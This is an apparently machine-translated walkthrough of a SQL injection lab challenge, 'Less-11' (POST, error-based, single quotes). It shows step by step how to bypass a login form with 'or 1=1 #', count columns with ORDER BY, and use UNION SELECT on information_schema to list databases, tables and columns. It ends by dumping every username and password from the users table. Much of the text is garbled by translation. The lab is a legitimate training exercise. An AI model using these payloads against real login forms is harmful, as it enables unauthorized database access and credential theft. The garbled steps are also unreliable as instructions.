11 POST-Less - Based Error - Single QUOTES - String
. 0x01 original page
check elements can see the user name and password are two parameters uname and passwd
Enter the correct user name and password
Have the correct echo
Input user name and password incorrect
0x02. Analyzing injection type
the uname the passwd = =. 1. 1
the uname =. 1 ". 1 = the passwd
the uname =. 1 '. 1 the passwd =
You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '1' LIMIT
0,1' at line 1
Analyzing single quotes may be closed by a given sentence
Analyzing 0x03 injection point
universal password: uname = 1 'or 1 = 1 #
Have the correct data
uname = admin 'and' 1 ' =' 2
page no data, thereby determining the presence of at uname sql injection vulnerability
0x04. Determines the number of fields
the uname = ADMIN '. 3 by Order #
(# sql statement content for later commented)
Error, indicating the number of fields is not 3, continue to test
ADMIN = the uname 'by Order # 2
(# comment out the content for later sql statement)
With the correct data show, indicating that the query returns the number of fields is 2, but does not represent the number of fields in the table 2.
0x05. Query version
uname = -1 'union select 1, version () #
0x06. Querying the database
uname = -1 'union select 1, (select group_concat (schema_name) from information_schema.schemata) #
Your Password:information_schema,challenges,cms,dvwa,espcms_v5,mysql,performance_schema,pikachu,security,sqltest,test
0x07. Queries the database table
uname = -1 'union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = "security") #
Your Password:emails,referers,uagents,users
0x08. Lookup table fields
uname=-1’ union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#
Your Password:id,username,password
0x09. Obtain the value
uname = -1 'union select 1, (select group_concat (username, 0x3a, password) from users) #
Your
Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4,admin'--
-:123456